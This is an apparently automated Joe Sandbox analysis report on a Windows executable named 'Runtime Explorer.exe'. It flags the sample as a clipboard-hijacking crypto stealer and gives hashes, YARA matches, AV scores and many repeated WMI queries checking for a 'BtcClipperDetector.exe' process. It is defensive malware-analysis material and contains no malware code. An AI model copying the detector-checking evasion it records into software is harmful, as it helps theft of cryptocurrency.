Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Windows Analysis Report
Runtime Explorer.exe

Overview

General Information

Sample Name:Runtime Explorer.exe
Analysis ID:599518
MD5:d42c2456ea9de66a75a29dea464a4e4d
SHA1:1e8ce36d82aab5d9ae09630bf01a77d92778d603
SHA256:907e7f7e2ee47c955cf315747ab913b591e9046f51c0f3ba9a6eef696346198e
Tags:exe
Infos:

Detection

Clipboard Hijacker
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Yara detected Clipboard Hijacker
Multi AV Scanner detection for submitted file
Uses Windows timers to delay execution
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Program does not show much activity (idle)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • Runtime Explorer.exe (PID: 6616 cmdline: "C:\Users\user\Desktop\Runtime Explorer.exe" MD5: D42C2456EA9DE66A75A29DEA464A4E4D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Runtime Explorer.exeJoeSecurity_Clipboard_Hijacker_3Yara detected Clipboard HijackerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.699080451.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_Clipboard_Hijacker_3Yara detected Clipboard HijackerJoe Security
      00000000.00000000.430713298.0000000000401000.00000020.00000001.01000000.00000003.sdmpJoeSecurity_Clipboard_Hijacker_3Yara detected Clipboard HijackerJoe Security
        Process Memory Space: Runtime Explorer.exe PID: 6616JoeSecurity_Clipboard_Hijacker_3Yara detected Clipboard HijackerJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.2.Runtime Explorer.exe.400000.0.unpackJoeSecurity_Clipboard_Hijacker_3Yara detected Clipboard HijackerJoe Security
            0.0.Runtime Explorer.exe.400000.0.unpackJoeSecurity_Clipboard_Hijacker_3Yara detected Clipboard HijackerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Joe Sandbox Signatures

              • AV Detection
              • Compliance
              • System Summary
              • Hooking and other Techniques for Hiding and Protection
              • Malware Analysis System Evasion
              • Anti Debugging
              • Stealing of Sensitive Information

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: Runtime Explorer.exeAvira: detected
              Source: Runtime Explorer.exeVirustotal: Detection: 73%Perma Link
              Source: Runtime Explorer.exeMetadefender: Detection: 40%Perma Link
              Source: Runtime Explorer.exeReversingLabs: Detection: 69%
              Source: 0.0.Runtime Explorer.exe.400000.0.unpackAvira: Label: TR/ClipBanker.avslj
              Source: Runtime Explorer.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: Runtime Explorer.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              Source: Runtime Explorer.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
              Source: Runtime Explorer.exeVirustotal: Detection: 73%
              Source: Runtime Explorer.exeMetadefender: Detection: 40%
              Source: Runtime Explorer.exeReversingLabs: Detection: 69%
              Source: C:\Users\user\Desktop\Runtime Explorer.exeFile created: C:\Users\user\AppData\Local\Temp\~DF685518F28E77605E.TMPJump to behavior
              Source: Runtime Explorer.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Runtime Explorer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\Runtime Explorer.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
              Source: classification engineClassification label: mal68.spyw.evad.winEXE@1/0@0/0
              Source: unknownProcess created: C:\Users\user\Desktop\Runtime Explorer.exe
              Source: C:\Users\user\Desktop\Runtime Explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
              Source: C:\Users\user\Desktop\Runtime Explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM win32_process WHERE Name = 'BtcClipperDetector.exe'
